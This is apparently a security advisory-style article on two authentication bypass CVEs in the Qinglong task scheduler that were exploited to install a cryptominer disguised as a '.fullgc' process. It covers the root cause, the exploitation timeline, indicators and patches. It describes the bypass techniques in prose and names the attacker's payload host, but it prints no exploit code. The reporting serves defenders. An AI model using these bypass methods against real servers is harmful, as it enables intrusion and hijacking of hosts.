Qinglong Task Scheduler Exposes RCE via Authentication Bypass: Cryptomining Incidents and Patch Timeline
OverviewTwo authentication bypass flaws in the Qinglong open‑source task scheduling platform enabled remote code execution (RCE) and allowed attackers to deploy cryptomining software on exposed servers. Exploitation began in early February, with public disclosure at month’s end, and rapid activity observed across multiple deployments. Qinglong, a self-hosted time management/dashboard tool popular among developers, has been forked thousands of times and remains under active scrutiny as researchers assess the scope of impact and the effectiveness of subsequent fixes.
The VulnerabilitiesTwo CVEs describe the core bypass issues that enabled unauthorized access to administrative endpoints and subsequent code execution:
- CVE-2026-3965: A misconfigured rewrite rule mapped /open/* requests to /api/*, unintentionally exposing protected admin endpoints through an unauthenticated path. In short, sensitive admin routes were reachable without proper authentication due to routing misalignment.
- CVE-2026-4047: The authentication check treated paths as case‑sensitive (for example, /api/), while the router processed them in a case‑insensitive manner. This allowed requests that varied in case to bypass authentication and reach protected endpoints.
Root cause and technical contextThe common thread behind both flaws was a mismatch between the security middleware’s assumptions and the Express.js routing behavior used by Qinglong. Security logic assumed one set of URL patterns would be handled in a particular way, while the framework treated those patterns differently. In the researchers’ words, the auth layer assumed URL structures would consistently map to protected resources, whereas the routing engine sometimes diverged from those expectations. This disconnect created an exploitable gap that attackers could leverage to reach admin functions without valid credentials.
Exploitation timeline and observed activity
- Exploitation window: Attacks targeting these vulnerabilities began in early February, prior to the public disclosure at the end of February. Snyk and other researchers tracked ongoing activity through March.
- Initial discovery by users: Reports from Qinglong users identified rogue processes consuming substantial CPU resources, notably a hidden process named “.fullgc” that consumed between 85% and 100% of CPU. The name was chosen to imitate a benign “Full GC” operation, a tactic to evade detection.
- Initial exploitation specifics: Attackers altered Qinglong’s config.sh to inject commands that downloaded a cryptominer and executed it in the background, placing the miner at /ql/data/db/.fullgc.
- Payload and targets: The remote payload was hosted at a domain associated with file.551911.xyz and included binaries for Linux x86_64, ARM64, and macOS.
- Infections across environments: Infections were observed in diverse setups, including deployments behind Nginx and SSL relays. The attacks continued into early March, with multiple confirmed infections across different installations.
- Public and maintainer response: Public notices and issue threads began surfacing in late February/early March. Maintainers acknowledged the vulnerability and initially urged users to update. Mitigations introduced in an early pull request focused on blocking certain command‑injection patterns but were deemed insufficient by researchers.
- Final corrective measure: A more complete fix arrived later in PR #2941, which addressed the authentication bypass in the middleware itself. This aligned the authorization logic with the actual routing behavior, effectively closing the bypass vector.
Impact and scope
- Affected versions: The vulnerabilities impacted Qinglong versions 2.20.1 and older. Systems running these versions that were publicly accessible or inadequately protected faced the highest risk.
- Real‑world impact: The attacks demonstrated that unauthenticated access to admin endpoints could be weaponized to alter configurations, spawn malicious processes, and drop cryptominers onto host systems. The persistence and stealth of the mechanism—running a background miner under a name designed to resemble a legitimate maintenance task—highlighted the challenge of quickly identifying compromised hosts.
- Platform context: Qinglong has gained notable traction in the developer community, with thousands of forks and tens of thousands of stars on the code hosting platform. This scale amplified the potential attack surface and underscored the importance of timely fixes and clear disclosure.
Attack footprint and defensive observations
- Behavior observed by researchers: Attackers leveraged the forged admin access to modify configuration scripts and insert commands that fetched miner binaries from remote resources, then executed them in persistent background processes.
- Detection signals: The emergence of a high‑CPU process named with a “.fullgc” suffix served as an unusual indicator. The manipulation of config.sh and unexpected network activity to pull binaries were additional red flags reported by affected users.
- Remediation trajectory: Initial mitigations aimed at filtering command‑injection patterns fell short of addressing the root cause. The subsequent middleware‑level fix corrected the core authentication bypass, reducing the likelihood of unauthenticated access to protected endpoints.
What changed in the patch process
- Early mitigation attempts: The first round of fixes focused on defensive patterns—identifying and blocking specific command‑execution patterns and injection points. While these helped in some scenarios, researchers argued that they did not fully resolve the security gap.
- Definitive fix: The more robust correction was implemented in a subsequent update that reconciled the authentication logic with the routing framework’s behavior. By aligning middleware expectations with Express.js routing, the system no longer treated protected endpoints as unauthenticated under certain request patterns.
- State of unpatched instances: Given the rapid pace of discovery and deployment, some installations remained on vulnerable versions for weeks after disclosure. The combination of public accessibility and inconsistent patch adoption contributed to continued risk until the later fix was widely adopted.
Context and related security culture
- Open‑source dynamics: Qinglong’s popularity underscores a broader reality in open‑source software where widely used tooling can become attractive targets for malicious actors. The incident illustrates how systemic security gaps—rooted in routing and middleware interaction—can enable large‑scale exploitation if not promptly recognized and addressed.
- Industry takeaway: The episode reinforces the importance of integrating secure defaults in web frameworks and ensuring that authentication layers accurately reflect the behavior of underlying routers and handlers.
Current status and implications
- Security posture: With the middleware fix in place, the primary bypass pathway is mitigated. However, the case emphasizes the need for ongoing monitoring of open‑source components used in production environments and for promptly applying patches as they become available.
- Operational diligence: Administrators relying on Qinglong should validate their deployments against known vulnerable versions, verify that admin endpoints are not exposed, and monitor for unusual processes or CPU spikes that could indicate cryptominer activity or other tampering.
- Community and governance: The incident has fed into ongoing discussions about how maintainers communicate vulnerabilities, coordinate releases, and ensure timely, actionable guidance reaches users deploying open‑source software at scale.
SummaryTwo authentication bypass flaws in Qinglong exposed protected admin endpoints through a misalignment between security middleware and Express.js routing. Exploitation began early in the year and led to cryptomining deployments on exposed servers, with a notable pattern of a stealthy background process named “.fullgc.” The root cause centered on a middleware/route mismatch, and a comprehensive fix was later introduced to close the bypass. The episode highlights the critical importance of aligning authentication with routing logic in web applications, especially in widely used open‑source projects that form the backbone of development workflows.
